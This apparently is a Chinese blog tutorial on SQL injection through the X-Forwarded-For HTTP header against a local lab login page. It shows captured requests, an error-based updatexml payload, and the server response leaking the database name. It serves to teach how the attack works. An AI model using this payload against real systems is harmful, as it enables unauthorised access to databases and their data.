http头部注入

http头部注入

我们首先可以在浏览器设置手动代理模式,然后通过burpsuite进行代理配置后进行抓包,如下是一个网站登录页面的http头部信息:

POST /baji/check_login.php HTTP/1.1
Host: 192.168.120.137
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:49.0) Gecko/20100101 Firefox/49.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://192.168.120.137/baji/login.php
Cookie: PHPSESSID=0minmo2e9at6uucdton5udeg05
DNT: 1
X-Forwarded-For: 8.8.8.8
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 29

username=admin&password=admin

因为我们这个网站代码中的ip字段和数据库中有交互,所以我们可以通过http头部信息中的X-Forwarded-For字段进行注入,注入代码如下:

POST /baji/check_login.php HTTP/1.1
Host: 192.168.120.137
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:49.0) Gecko/20100101 Firefox/49.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://192.168.120.137/baji/login.php
Cookie: PHPSESSID=0minmo2e9at6uucdton5udeg05
DNT: 1
X-Forwarded-For: 8.8.'and updatexml(1,(concat(0x23,database(),0x23)),3) and'.8
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 29

username=admin&password=admin

服务器的回应:

HTTP/1.1 200 OK
Date: Tue, 25 Jun 2019 11:05:32 GMT
Server: Apache/2.4.23 (Win32) OpenSSL/1.0.2j PHP/5.4.45
X-Powered-By: PHP/5.4.45
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 46
Connection: close
Content-Type: text/html;charset=utf-8

查询日志出错XPATH syntax error: '#baji#'

error后面的baji就是我们想要的结果。
这就是我理解的http头部注入的原理,http头部注入的前提是头部字段中的数据要与数据库产生交互,然后把你的注入代码组合到相应的字段里。

你可能感兴趣的:(http头部注入,网络安全,sql注入)